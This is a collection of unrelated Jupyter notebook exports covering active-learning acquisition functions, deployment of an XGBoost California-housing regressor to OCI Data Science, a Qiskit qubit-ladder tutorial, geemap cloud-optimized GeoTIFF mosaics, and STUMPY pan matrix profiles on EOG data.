X_acquired0 = X_acquired_var[:, :, 0].reshape((-1, w_min, 1))
X_acquired1 = X_acquired_var[:, :, 1].reshape((-1, w_min, 1))
X_acquired2 = X_acquired_var[:, :, 2].reshape((-1, w_min, 1))
print (X_acquired0.shape, X_acquired1.shape, X_acquired2.shape)
hist = model.fit([X_acquired0, X_acquired1, X_acquired2], Y_acquired_var, epochs=30, batch_size=4, \
validation_data=([X_test0, X_test1, X_test2], Y_test))
inc_acc = max(hist.history['val_acc'])
model.evaluate([X_test0, X_test1, X_test2], Y_test, batch_size=8)
print ('Incremental Learning:', inc_acc)
acc_inc_var.append(inc_acc)
y_prob = model.predict([X_test0, X_test1, X_test2], batch_size=8)
y_pred = y_prob.argmax(axis=-1)
f1_inc_var.append(f1_score(y_test, y_pred, average='weighted'))
recall_inc_var.append(recall_score(y_test, y_pred, average='weighted'))
print ()
###Output
_____no_output_____
###Markdown
Max Entropy
###Code
acc_inc_maxent, f1_inc_maxent, recall_inc_maxent = [], [], []
# Acquisition queries 8 times
for n_queries in range(pool_min, pool_max, pool_iter)[1:]:
print ('Queries:', n_queries)
model = load_model('./Save_Files/Watch_User_i.h5')
maxent_uncertainty_estimates = maxentropy([X_pool_subset0, X_pool_subset1, X_pool_subset2], \
num_classes, model, 16, 10)
maxent_uncertainty_estimates = maxent_uncertainty_estimates.flatten()
acquired_indices = maxent_uncertainty_estimates.argsort()[-n_queries:][::-1]
X_acquired_maxent = X_pool[acquired_indices]
Y_acquired_maxent = Y_pool[acquired_indices]
print ('Max Entropy Acquired Shape:', X_acquired_maxent.shape, Y_acquired_maxent.shape)
y_acquired_maxent = Y_acquired_maxent.argmax(axis=-1)
np.bincount(y_acquired_maxent)
# Incremental Learning
X_acquired0 = X_acquired_maxent[:, :, 0].reshape((-1, w_min, 1))
X_acquired1 = X_acquired_maxent[:, :, 1].reshape((-1, w_min, 1))
X_acquired2 = X_acquired_maxent[:, :, 2].reshape((-1, w_min, 1))
print (X_acquired0.shape, X_acquired1.shape, X_acquired2.shape)
hist = model.fit([X_acquired0, X_acquired1, X_acquired2], Y_acquired_maxent, epochs=30, batch_size=4, \
validation_data=([X_test0, X_test1, X_test2], Y_test))
inc_acc = max(hist.history['val_acc'])
model.evaluate([X_test0, X_test1, X_test2], Y_test, batch_size=8)
print ('Incremental Learning:', inc_acc)
acc_inc_maxent.append(inc_acc)
y_prob = model.predict([X_test0, X_test1, X_test2], batch_size=8)
y_pred = y_prob.argmax(axis=-1)
f1_inc_maxent.append(f1_score(y_test, y_pred, average='weighted'))
recall_inc_maxent.append(recall_score(y_test, y_pred, average='weighted'))
print ()
###Output
_____no_output_____
###Markdown
Random Acquisitions
###Code
acc_inc_rand, f1_inc_rand, recall_inc_rand = [], [], []
# Acquisition queries 8 times
for n_queries in range(pool_min, pool_max, pool_iter)[1:]:
print ('Queries:', n_queries)
model = load_model('./Save_Files/Watch_User_i.h5')
rand_uncertainty_estimates = random_acq([X_pool_subset0, X_pool_subset1, X_pool_subset2], \
num_classes, model, 16, 10)
rand_uncertainty_estimates = rand_uncertainty_estimates.flatten()
acquired_indices = rand_uncertainty_estimates.argsort()[-n_queries:][::-1]
X_acquired_rand = X_pool[acquired_indices]
Y_acquired_rand = Y_pool[acquired_indices]
print ('Random Acquired Shape:', X_acquired_rand.shape, Y_acquired_rand.shape)
y_acquired_rand = Y_acquired_rand.argmax(axis=-1)
np.bincount(y_acquired_rand)
# Incremental Learning
X_acquired0 = X_acquired_rand[:, :, 0].reshape((-1, w_min, 1))
X_acquired1 = X_acquired_rand[:, :, 1].reshape((-1, w_min, 1))
X_acquired2 = X_acquired_rand[:, :, 2].reshape((-1, w_min, 1))
print (X_acquired0.shape, X_acquired1.shape, X_acquired2.shape)
hist = model.fit([X_acquired0, X_acquired1, X_acquired2], Y_acquired_rand, epochs=60, batch_size=16, \
validation_data=([X_test0, X_test1, X_test2], Y_test))
inc_acc = max(hist.history['val_acc'])
model.evaluate([X_test0, X_test1, X_test2], Y_test, batch_size=8)
print ('Incremental Learning:', inc_acc)
acc_inc_rand.append(inc_acc)
y_prob = model.predict([X_test0, X_test1, X_test2], batch_size=8)
y_pred = y_prob.argmax(axis=-1)
f1_inc_rand.append(f1_score(y_test, y_pred, average='weighted'))
recall_inc_rand.append(recall_score(y_test, y_pred, average='weighted'))
print ()
acc_inc_df = pd.DataFrame(index=np.arange(pool_min, pool_max, pool_iter)[1:])
acc_inc_df['BALD'] = np.array(acc_inc_bald) * 100
acc_inc_df['VarRatio'] = np.array(acc_inc_var) * 100
acc_inc_df['MaxEntropy'] = np.array(acc_inc_maxent) * 100
acc_inc_df['Random'] = np.array(acc_inc_rand) * 100
acc_inc_df
f1_inc_df = pd.DataFrame(index=np.arange(pool_min, pool_max, pool_iter)[1:])
f1_inc_df['BALD'] = np.array(f1_inc_bald) * 100
f1_inc_df['VarRatio_'] = np.array(f1_inc_var) * 100
f1_inc_df['MaxEntropy'] = np.array(f1_inc_maxent) * 100
f1_inc_df['Random'] = np.array(f1_inc_rand) * 100
f1_inc_df
recall_inc_df = pd.DataFrame(index=np.arange(pool_min, pool_max, pool_iter)[1:])
recall_inc_df['BALD'] = np.array(recall_inc_bald) * 100
recall_inc_df['VarRatio_'] = np.array(recall_inc_var) * 100
recall_inc_df['MaxEntropy'] = np.array(recall_inc_maxent) * 100
recall_inc_df['Random'] = np.array(recall_inc_rand) * 100
recall_inc_df
acc_inc_df.to_csv('./CSV_Results/User_i/acc_inc.csv', sep=',')
f1_inc_df.to_csv('./CSV_Results/User_i/f1_inc.csv', sep=',')
recall_inc_df.to_csv('./CSV_Results/User_i/recall_inc.csv', sep=',')
###Output
_____no_output_____ |
california_housing_model_deployment.ipynb | ###Markdown
Regression and One-click deployment exampleIn this Notebook I walk through all the steps needed to develop a **regression model** and save the model to the OCI Data Science **Model Catalog**.After the model have been saved, I deploy the model as a **REST** service.The Notebook is based on the **California Housing Dataset**, downloaded from SKlearn
###Code
import pandas as pd
import numpy as np
from pandas.api.types import is_numeric_dtype
# the dataset used for the example
from sklearn.datasets import fetch_california_housing
from sklearn.model_selection import train_test_split
# the GBM used
import xgboost as xgb
# to use ADSTuner
from ads.hpo.search_cv import ADSTuner
from ads.hpo.stopping_criterion import *
from ads.hpo.distributions import *
# to save to Model catalog
import pickle
import os
from ads import set_auth
from ads.common.model_artifact import ModelArtifact
from ads.common.model_export_util import prepare_generic_model
from ads.common.model_metadata import (MetadataCustomCategory,
UseCaseType)
###Output
_____no_output_____
###Markdown
some utility functions
###Code
# functions
def get_general_info(data_df):
print(f"There are: {len(data_df.columns)} columns in the dataset")
print()
print(
"The list of column names, in alphabetical order:",
sorted(list(data_df.columns)),
)
print()
print(f"There are {data_df.shape[0]} records in the dataset")
print()
return
# well you have to decide a threshold in term of a fraction
# to decide if the col is categorical
FRAC = 0.1
def analyze_df(data_df):
# it is ok to use isna, isnull is an alias of isna
missing_val = data_df.isna().sum()
# cardinality
THR = data_df.shape[0] * FRAC
list_card = []
list_cat = []
list_dtypes = []
list_num_zeros = []
for col in data_df.columns:
# count the # of distinct values
n_distinct = data_df[col].nunique()
list_card.append(n_distinct)
# is categorical is decide on this rule
if n_distinct < THR:
# categorical
list_cat.append("Yes")
else:
list_cat.append("No")
list_dtypes.append(data_df[col].dtype)
# build the results DF
result_df = pd.DataFrame(
{
"col_name": list(data_df.columns),
"missing_vals": missing_val,
"cardinality": list_card,
"is_categorical": list_cat,
"data_type": list_dtypes,
},
index=None,
)
# if you don't want cols as index
result_df.reset_index(drop=True, inplace=True)
return result_df
def show_tuner_results(tuner):
# to count completed
result_df = tuner.trials[tuner.trials["state"] == "COMPLETE"].sort_values(
by=["value"], ascending=False
)
print("ADSTuner session results:")
print(f"ADSTuner has completed {result_df.shape[0]} trials")
print()
print(f"The best trial is the #: {tuner.best_index}")
print(f"Parameters for the best trial are: {tuner.best_params}")
print(f"The metric used to optimize is: {tuner.scoring_name}")
print(f"The best score is: {round(tuner.best_score, 4)}")
###Output
_____no_output_____
###Markdown
Load the dataset
###Code
# load the dataset
housing = fetch_california_housing(as_frame=True)
orig_df = housing.frame
orig_df.head()
###Output
_____no_output_____
###Markdown
some EDA
###Code
get_general_info(orig_df)
analyze_df(orig_df)
# In this example I'll use all the columns (ex MedHouseVal) as features, except Lat, Long, to simplify
TARGET = "MedHouseVal"
all_cols = list(orig_df.columns)
cols_to_drop = ['Latitude', 'Longitude']
cat_cols = ['HouseAge']
# take care, I have sorted
FEATURES = sorted(list(set(all_cols) - set([TARGET])- set(cols_to_drop)))
# for LightGBM
cat_columns_idxs = [i for i, col in enumerate(FEATURES) if col in cat_cols]
FEATURES
# the only important thing is that we have 1 categorical column: HouseAge
# we will code categorical as integer starting from zero
# in this case it is easy, since the minimum is 1... so we need only to subtract 1
# make a copy before any changes
used_df = orig_df.copy()
used_df['HouseAge'] = used_df['HouseAge'] - 1.
used_df['HouseAge'] = used_df['HouseAge'].astype(int)
used_df['HouseAge'] = used_df['HouseAge'].astype("category")
# let's make a simple train/test split
X = used_df[FEATURES].values
y = used_df[TARGET].values
TEST_SIZE = 0.2
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=TEST_SIZE, random_state=1)
###Output
_____no_output_____
###Markdown
HPO using ADSTuner
###Code
STUDY_NAME = "xgb001"
FOLDS = 5
TIME_BUDGET = 1800
#
# Here we define the strategy, the space for hyper-parameters we want to explore
#
params = {
"n_estimators": CategoricalDistribution([100, 200, 300, 400, 500, 600, 700, 800, 900, 1000]),
"learning_rate": LogUniformDistribution(low=1e-4, high=1e-2),
"max_depth": IntUniformDistribution(5, 10),
}
alg_reg = xgb.XGBRegressor()
tuner = ADSTuner(
alg_reg, cv=FOLDS, strategy=params, study_name=STUDY_NAME, scoring='neg_mean_absolute_error', n_jobs=8)
tuner.tune(X_train, y_train, exit_criterion=[TimeBudget(TIME_BUDGET)])
# get the status to see if completed
print(f"The tuner status is: {tuner.get_status()}")
print(f"Remaining time is: {round(tuner.time_remaining, 1)} sec.")
show_tuner_results(tuner)
# look only at completed trials, sorted with best on top. Metric chosen is in the value col.
result_df = tuner.trials[tuner.trials["state"] == "COMPLETE"].sort_values(
by=["value"], ascending=False
)
result_df.head(10)
###Output
_____no_output_____
###Markdown
Train with best params
###Code
%%time
### train with best params
model = xgb.XGBRegressor(**tuner.best_params)
model.fit(X_train, y_train)
###Output
CPU times: user 1h 20min 33s, sys: 11.2 s, total: 1h 20min 45s
Wall time: 2min 51s
###Markdown
Save the model
###Code
# save the model
MODEL_FILE_NAME = "model.pkl"
pickle.dump(model, open(MODEL_FILE_NAME, "wb"))
# test if it loads correctly
loaded_model = pickle.load(open(MODEL_FILE_NAME, "rb"))
loaded_model
###Output
_____no_output_____
###Markdown
Prepare for Model Catalog
###Code
PATH_ARTEFACT = f"./model-files"
if not os.path.exists(PATH_ARTEFACT):
os.mkdir(PATH_ARTEFACT)
# if we pass x_test, y_test generates in metadata also the schema
artifact = prepare_generic_model(model=model, model_path=PATH_ARTEFACT,
force_overwrite=True,
data_science_env=True,
X_sample=X_test,
y_sample=y_test,
use_case_type=UseCaseType.REGRESSION)
# add the model file to the PATH_ARTEFACT directory
pickle.dump(model, open(PATH_ARTEFACT + "/" + MODEL_FILE_NAME, "wb"))
# to set the serialization format in metadata
artifact.reload(model_file_name=MODEL_FILE_NAME)
###Output
_____no_output_____
###Markdown
Customize score.py
###Code
%%writefile {PATH_ARTEFACT}/score.py
import pandas as pd
import numpy as np
from xgboost import XGBClassifier
import json
import os
import pickle
import io
import logging
# logging configuration - OPTIONAL
logging.basicConfig(format='%(name)s - %(levelname)s - %(message)s', level=logging.INFO)
logger_pred = logging.getLogger('model-prediction')
logger_pred.setLevel(logging.INFO)
logger_feat = logging.getLogger('input-features')
logger_feat.setLevel(logging.INFO)
model_name = 'model.pkl'
# to enable/disable detailed logging
DEBUG = True
"""
Inference script. This script is used for prediction by scoring server when schema is known.
"""
def load_model(model_file_name=model_name):
"""
Loads model from the serialized format
Returns
-------
model: a model instance on which predict API can be invoked
"""
model_dir = os.path.dirname(os.path.realpath(__file__))
contents = os.listdir(model_dir)
# Load the model from the model_dir using the appropriate loader
if model_file_name in contents:
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), model_file_name), "rb") as file:
model = pickle.load(file)
logger_pred.info("Loaded the model !!!")
else:
raise Exception('{0} is not found in model directory {1}'.format(model_file_name, model_dir))
return model
def pre_inference(data):
"""
Preprocess data
Parameters
----------
data: Data format as expected by the predict API of the core estimator.
Returns
-------
data: Data format after any processing.
"""
logger_pred.info("Preprocessing...")
return data
def post_inference(yhat):
"""
Post-process the model results
Parameters
----------
yhat: Data format after calling model.predict.
Returns
-------
yhat: Data format after any processing.
"""
logger_pred.info("Postprocessing output...")
return yhat
def predict(data, model=load_model()):
"""
Returns prediction given the model and data to predict
Parameters
----------
model: Model instance returned by load_model API
data: Data format as expected by the predict API of the core estimator. For eg. in case of sckit models it could be numpy array/List of list/Pandas DataFrame
Returns
-------
predictions: Output from scoring server
Format: {'prediction': output from model.predict method}
"""
logger_pred.info("In function predict...")
# some check
assert model is not None, "Model is not loaded"
x = pd.read_json(io.StringIO(data)).values
if DEBUG:
logger_feat.info("Logging features")
logger_feat.info(x)
# preprocess data (for example normalize features)
x = pre_inference(x)
logger_pred.info("Invoking model......")
# compute predictions (binary, from model)
preds = model.predict(x)
# to avoid not JSON serialiable error (np.array is not)
preds = preds.tolist()
# post inference not needed
return {'prediction': preds}
###Output
Overwriting ./model-files/score.py
###Markdown
Model introspection
###Code
artifact.introspect()
# check all the info that will be saved to the Model Catalog
artifact.metadata_taxonomy.to_dataframe()
###Output
_____no_output_____
###Markdown
Some tests on the code before saving to Model Catalog
###Code
# %reload_ext autoreload
%load_ext autoreload
%autoreload 2
# add the path of score.py:
import sys
sys.path.insert(0, PATH_ARTEFACT)
from score import load_model, predict
# Load the model to memory
_ = load_model()
# select some records
START = 40
END = 50
predictions_test = predict(json.dumps(X_test[START:END].tolist()), _)
print()
print("*********************************")
print("Tests results:")
print()
print("Predicted:")
print(np.around(predictions_test['prediction'], 3))
print()
print("Expected:")
print(y_test[START:END])
print()
print(f"Computed MAE: {round(np.abs(predictions_test['prediction'] - y_test[START:END]).mean(), 2)}")
###Output
INFO:model-prediction:In function predict...
INFO:input-features:Logging features
INFO:input-features:[[1.05042017e+00 4.66386555e+00 5.08403361e+00 1.90000000e+01
2.24480000e+00 1.66500000e+03]
[1.02360877e+00 3.37268128e+00 6.10455312e+00 2.50000000e+01
4.99620000e+00 2.00000000e+03]
[1.09302326e+00 2.34302326e+00 5.56395349e+00 5.10000000e+01
3.23440000e+00 4.03000000e+02]
[1.20202020e+00 2.03030303e+00 4.06734007e+00 4.30000000e+01
2.61030000e+00 6.03000000e+02]
[9.26931106e-01 3.05219207e+00 4.34864301e+00 2.60000000e+01
2.64390000e+00 1.46200000e+03]
[1.03645008e+00 4.93977813e+00 4.36291601e+00 3.30000000e+01
3.17130000e+00 3.11700000e+03]
[1.75000000e+00 4.00000000e+00 1.05000000e+01 2.30000000e+01
5.87500000e+00 3.20000000e+01]
[1.03831982e+00 3.28150332e+00 6.07516581e+00 1.40000000e+01
5.48290000e+00 4.45300000e+03]
[1.00502513e+00 2.83542714e+00 4.56030151e+00 3.20000000e+01
3.24690000e+00 2.25700000e+03]
[1.10979228e+00 3.04451039e+00 4.75667656e+00 3.90000000e+01
1.36500000e+00 1.02600000e+03]]
INFO:model-prediction:Preprocessing...
INFO:model-prediction:Invoking model......
*********************************
Tests results:
Predicted:
[0.87 2.212 2.412 2.472 1.159 1.587 3.147 2.12 1.957 0.795]
Expected:
[0.589 1.56 2.455 5. 0.691 1.701 1.938 1.996 2.069 0.543]
Computed MAE: 0.58
###Markdown
Save to Model Catalog
###Code
# Saving the model artifact to the model catalog.
compartment_id = os.environ['NB_SESSION_COMPARTMENT_OCID']
project_id = os.environ['PROJECT_OCID']
set_auth(auth='resource_principal')
#
# Save to Model Catalog
#
catalog_entry = artifact.save(display_name='california-housing1',
description='A model for regression',
# to avoid to commit (be careful)
ignore_pending_changes=True)
###Output
_____no_output_____ |
tutorials/ladder.ipynb | ###Markdown
How to use `ladder`
###Code
import sys
sys.path.append('../')
import CreativeQiskit
###Output
_____no_output_____
###Markdown
A single qubit cannot store more than one bit of information. But if we are happy to run our program many times and do some statistics, one repeatedly used qubit can store more information. The ladder class does just this, by encoding an `int` like object into a qubit.These quantum integers run from a minimum value of `0` to a maximum of `d`, which is the input we must supply when initializing a `ladder` object. Let's go for `d=3` in our first example.
###Code
A = CreativeQiskit.ladder(3)
###Output
_____no_output_____
###Markdown
The initial value for a `ladder` object is always `0`.
###Code
a = A.value()
print(' Initial value =',a)
###Output
Initial value = 0
###Markdown
We can add to this to get other numbers.
###Code
A.add(1)
print(' Add 1 ---> value =',A.value())
A.add(2)
print(' Add 2 ---> value =',A.value())
###Output
Add 2 ---> value = 3
###Markdown
Once the maximum value has been reached, the `add()` method will instead start substracting. This is the inspiration behind the 'ladder' name: once you've reached the top, there's nowhere to climb but back down again.
###Code
for example in range(9):
A.add(1)
print(' Add 1 ---> value =',A.value())
###Output
Add 1 ---> value = 2
Add 1 ---> value = 1
Add 1 ---> value = 0
Add 1 ---> value = 1
Add 1 ---> value = 2
Add 1 ---> value = 3
Add 1 ---> value = 2
Add 1 ---> value = 1
Add 1 ---> value = 0
###Markdown
Since we are doing statistics in order to squeeze an `int` like object into a qubit, the behaviour can sometimes be erratic. This becomes ever more true for larger values of `d`.The erratic behaviour is also dependent on the kwargs for the `value()` method. It can be due to the statistical noise of using only few samples, or the real of simulated noise found on current prototype devices. These are controlled using the standard kwargs `device`, `noisy` and `shots` as explained in [the README](README.md). The more statistical noise you have from a low value of `shots` (which should be around 1000 times greater than `d`), and the more quantum noise you have from a real device, the more strange behaviour you will see.In the example below, shots is only $5 \times$`d`.
###Code
A = CreativeQiskit.ladder(10)
for example in range(20):
print(' Add 1 ---> value =',A.value(shots=50))
A.add(1)
###Output
Add 1 ---> value = 0
Add 1 ---> value = 1
Add 1 ---> value = 2
Add 1 ---> value = 2
Add 1 ---> value = 4
Add 1 ---> value = 5
Add 1 ---> value = 6
Add 1 ---> value = 8
Add 1 ---> value = 9
Add 1 ---> value = 10
Add 1 ---> value = 10
Add 1 ---> value = 9
Add 1 ---> value = 9
Add 1 ---> value = 8
Add 1 ---> value = 6
Add 1 ---> value = 5
Add 1 ---> value = 4
Add 1 ---> value = 3
Add 1 ---> value = 3
Add 1 ---> value = 0
###Markdown
Here's an example where the noise of current prototype devices is simulated.
###Code
A = CreativeQiskit.ladder(10)
for example in range(20):
print(' Add 1 ---> value =',A.value(noisy=True))
A.add(1)
###Output
Add 1 ---> value = 2
Add 1 ---> value = 2
Add 1 ---> value = 3
Add 1 ---> value = 4
Add 1 ---> value = 4
Add 1 ---> value = 5
Add 1 ---> value = 5
Add 1 ---> value = 6
Add 1 ---> value = 7
Add 1 ---> value = 7
Add 1 ---> value = 7
Add 1 ---> value = 7
Add 1 ---> value = 6
Add 1 ---> value = 6
Add 1 ---> value = 6
Add 1 ---> value = 5
Add 1 ---> value = 5
Add 1 ---> value = 4
Add 1 ---> value = 4
Add 1 ---> value = 4
###Markdown
The `ladder` object was inspired by the way attacks are implemented in the game [Battleships with partial NOT gates](https://medium.com/qiskit/how-to-program-a-quantum-computer-982a9329ed02). In this, each player has three ships that take up a single position. One of them needs only one hit to be destroyed, one needs two hits and the other needs three. These can be implemented with `ladder` objects with `d=1`, `d=2` and `d=3`, respectively.
###Code
ship = [None]*3
ship[0] = CreativeQiskit.ladder(1)
ship[1] = CreativeQiskit.ladder(2)
ship[2] = CreativeQiskit.ladder(3)
###Output
_____no_output_____
###Markdown
Attacking a ship is then done by with `add(1)`, and a ship is declared destroyed once its value of `d` has been reached.*Note: The following cell is interactive so you'll need to run it yourself*
###Code
destroyed = 0
while destroyed<3:
attack = int(input('\n > Choose a ship to attack (0,1 or 2)...\n '))
ship[attack].add(1)
destroyed = 0
for j in range(3):
if ship[j].value()==ship[j].d:
print('\n *Ship',j,'has been destroyed!*')
destroyed += 1
print('\n **Mission complete!**')
###Output
_____no_output_____ |
_source/raw/recsys_streamlit_app.ipynb | ###Markdown
---
###Code
!mkdir ./ikea
!cp -r /content/pair/* ./ikea
###Output
_____no_output_____ |
examples/notebooks/45_cog_mosaic.ipynb | ###Markdown
Uncomment the following line to install [geemap](https://geemap.org) if needed.
###Code
# !pip install geemap
import geemap
# geemap.update_package()
Map = geemap.Map(ee_initialize=False, layer_ctrl=True, toolbar_ctrl=False)
Map
###Output
_____no_output_____
###Markdown
For this demo, we will use data from https://www.maxar.com/open-data/california-colorado-fires for mapping California and Colorado fires. A List of COGs can be found [here](https://github.com/giswqs/geemap/blob/master/examples/data/cog_files.txt).
###Code
URL = 'https://raw.githubusercontent.com/giswqs/geemap/master/examples/data/cog_files.txt'
import urllib
data = urllib.request.urlopen(URL)
links = []
for line in data:
links.append(line.decode("utf-8").strip())
links = links[1:] # remove the first line that does not contain .tif
# links
Map.add_cog_mosaic(links, name="CA Fire", show_footprints=True, verbose=True)
Map.addLayerControl()
Map
###Output
_____no_output_____
###Markdown
Uncomment the following line to install [geemap](https://geemap.org) if needed.**Important Note:** This notebook no longer works. The `add_cog_mosaic()` has been removed from leafmap. See https://github.com/giswqs/leafmap/issues/180
###Code
# !pip install geemap
import geemap
# geemap.update_package()
Map = geemap.Map(ee_initialize=False, layer_ctrl=True, toolbar_ctrl=False)
Map
###Output
_____no_output_____
###Markdown
For this demo, we will use data from https://www.maxar.com/open-data/california-colorado-fires for mapping California and Colorado fires. A List of COGs can be found [here](https://github.com/giswqs/geemap/blob/master/examples/data/cog_files.txt).
###Code
URL = (
'https://raw.githubusercontent.com/giswqs/geemap/master/examples/data/cog_files.txt'
)
import urllib
data = urllib.request.urlopen(URL)
links = []
for line in data:
links.append(line.decode("utf-8").strip())
links = links[1:] # remove the first line that does not contain .tif
# links
Map.add_cog_mosaic(links, name="CA Fire", show_footprints=True, verbose=True)
Map.addLayerControl()
Map
###Output
_____no_output_____
###Markdown
Uncomment the following line to install [geemap](https://geemap.org) if needed.**Important Note:** This notebook no longer works. The `add_cog_mosaic()` has been removed from leafmap. See https://github.com/giswqs/leafmap/issues/180
###Code
# !pip install geemap
import geemap
# geemap.update_package()
Map = geemap.Map(ee_initialize=False, layer_ctrl=True, toolbar_ctrl=False)
Map
###Output
_____no_output_____
###Markdown
For this demo, we will use data from https://www.maxar.com/open-data/california-colorado-fires for mapping California and Colorado fires. A List of COGs can be found [here](https://github.com/giswqs/geemap/blob/master/examples/data/cog_files.txt).
###Code
URL = 'https://raw.githubusercontent.com/giswqs/geemap/master/examples/data/cog_files.txt'
import urllib
data = urllib.request.urlopen(URL)
links = []
for line in data:
links.append(line.decode("utf-8").strip())
links = links[1:] # remove the first line that does not contain .tif
# links
Map.add_cog_mosaic(links, name="CA Fire", show_footprints=True, verbose=True)
Map.addLayerControl()
Map
###Output
_____no_output_____
###Markdown
Uncomment the following line to install [geemap](https://geemap.org) if needed.
###Code
# !pip install geemap
import geemap
# geemap.update_package()
Map = geemap.Map(ee_initialize=False, layer_ctrl=True, toolbar_ctrl=False)
Map
###Output
_____no_output_____
###Markdown
For this demo, we will use data from https://www.maxar.com/open-data/california-colorado-fires for mapping California and Colorado fires. A List of COGs can be found [here](https://github.com/giswqs/geemap/blob/master/examples/data/cog_files.txt).
###Code
URL = 'https://raw.githubusercontent.com/giswqs/geemap/master/examples/data/cog_files.txt'
import urllib
data = urllib.request.urlopen(URL)
links = []
for line in data:
links.append(line.decode("utf-8").strip())
links = links[1:] # remove the first line that does not contain .tif
# links
Map.add_COG_mosaic(links, name="CA Fire", show_footprints=True, verbose=True)
Map.addLayerControl()
Map
###Output
_____no_output_____
###Markdown
Uncomment the following line to install [geemap](https://geemap.org) if needed.
###Code
# !pip install geemap
import geemap
# geemap.update_package()
Map = geemap.Map(ee_initialize=False)
Map
###Output
_____no_output_____
###Markdown
For this demo, we will use data from https://www.maxar.com/open-data/california-colorado-fires for mapping California and Colorado fires. A List of COGs can be found [here](https://github.com/giswqs/geemap/blob/master/examples/data/cog_files.txt).
###Code
URL = 'https://raw.githubusercontent.com/giswqs/geemap/master/examples/data/cog_files.txt'
import urllib
data = urllib.request.urlopen(URL)
links = []
for line in data:
links.append(line.decode("utf-8").strip())
links = links[1:] # remove the first line that does not contain .tif
# links
Map.add_COG_mosaic(links, name="CA Fire", show_footprints=True, verbose=True)
Map.addLayerControl()
Map
###Output
_____no_output_____
###Markdown
Uncomment the following line to install [geemap](https://geemap.org) if needed.**Important Note:** This notebook no longer works. The `add_cog_mosaic()` has been removed from geemap. See https://github.com/giswqs/leafmap/issues/180
###Code
# !pip install geemap
import geemap
# geemap.update_package()
Map = geemap.Map(ee_initialize=False, layer_ctrl=True, toolbar_ctrl=False)
Map
###Output
_____no_output_____
###Markdown
For this demo, we will use data from https://www.maxar.com/open-data/california-colorado-fires for mapping California and Colorado fires. A List of COGs can be found [here](https://github.com/giswqs/geemap/blob/master/examples/data/cog_files.txt).
###Code
URL = (
'https://raw.githubusercontent.com/giswqs/geemap/master/examples/data/cog_files.txt'
)
import urllib
data = urllib.request.urlopen(URL)
links = []
for line in data:
links.append(line.decode("utf-8").strip())
links = links[1:] # remove the first line that does not contain .tif
# links
Map.add_cog_mosaic(links, name="CA Fire", show_footprints=True, verbose=True)
Map.addLayerControl()
Map
###Output
_____no_output_____ |
docs/Tutorial_Pan_Matrix_Profile.ipynb | ###Markdown
Finding and Visualizing Time Series Motifs of All Lengths using the Matrix Profile Import Some Packages
###Code
%matplotlib inline
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import cm
import ipywidgets as widgets
from ipywidgets import interact, Layout
import stumpy
plt.style.use('stumpy.mplstyle')
###Output
_____no_output_____
###Markdown
EOG ExampleSee [Figure 1](https://www.cs.ucr.edu/~eamonn/PAN_SKIMP%20%28Matrix%20Profile%20XX%29.pdf)
###Code
eog_df = pd.read_csv("https://zenodo.org/record/4733142/files/eog.csv?download=1")
m_250 = 250
m_500 = 500
mp_250 = stumpy.stump(eog_df["EOG"], m=m_250)
mp_500 = stumpy.stump(eog_df["EOG"], m=m_500)
motif_idx_250 = np.argmin(mp_250[:, 0])
motif_idx_500 = np.argmin(mp_500[:, 0])
nn_idx_250 = mp_250[motif_idx_250, 1]
nn_idx_500 = mp_500[motif_idx_500, 1]
fig, axs = plt.subplots(3)
axs[0].plot(eog_df["EOG"].values)
axs[1].plot(np.arange(m_250), eog_df.iloc[motif_idx_250 : motif_idx_250 + m_250])
axs[1].plot(np.arange(m_250), eog_df.iloc[nn_idx_250 : nn_idx_250 + m_250])
axs[2].plot(np.arange(m_500), eog_df.iloc[motif_idx_500 : motif_idx_500 + m_500])
axs[2].plot(np.arange(m_500), eog_df.iloc[nn_idx_500 : nn_idx_500 + m_500])
plt.show()
###Output
_____no_output_____
###Markdown
Compute the Pan Matrix Profile using STIMPEssentially, `stumpy.stimp` implements [Table 2](https://www.cs.ucr.edu/~eamonn/PAN_SKIMP%20%28Matrix%20Profile%20XX%29.pdf).
###Code
min_m, max_m = 100, 1000
eog = stumpy.stimp(eog_df["EOG"].values, min_m=min_m, max_m=max_m, percentage=0.01) # This percentage controls the extent of `stumpy.scrump` completion
percent_m = 0.01 # The percentage of windows to compute
n = np.ceil((max_m - min_m) * percent_m).astype(int)
for _ in range(n):
eog.update()
###Output
_____no_output_____
###Markdown
Above, we select a range of window sizes from `min_m = 3` to `max_m = 1000` and we arrange the windows in this range according to a breadth first order (this is done automatically by `stumpy.stimp` and see [slide 32](https://drive.google.com/file/d/1eT9oHOAKoi4oGkUX26V9aZIopov0Pxt5/view)) and/or [Section C](https://www.cs.ucr.edu/~eamonn/PAN_SKIMP%20%28Matrix%20Profile%20XX%29.pdf). The order of the window sizes to be processed can be found in `.M_` attribute:
###Code
eog.M_[:n]
###Output
_____no_output_____
###Markdown
Notice that we don't compute the matrix profiles (approximated using `stumpy.scrump` at 1% and with `pre-scrump` turned on) for all of the window sizes and, instead, we select only 1% of the window sizes (`percent_m = 0.01`) for this task. So, only a total of `n` matrix profiles were computed. Now, let's plot our pan matrix profile along with the locations of our motif pairs (vertical red lines):
###Code
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx_250, motif_idx_500, nn_idx_250, nn_idx_500]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(eog.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
# Draw some vertical lines where each motif and nearest neighbor are located
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
###Output
_____no_output_____
###Markdown
Now, we'll compute 2% more matrix profiles (for a total of 1% + 2% = 3%) for additional windows:
###Code
for _ in range(2 * n):
eog.update()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx_250, motif_idx_500, nn_idx_250, nn_idx_500]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(eog.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
# Draw some vertical lines where each motif and nearest neighbor are located
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
###Output
_____no_output_____
###Markdown
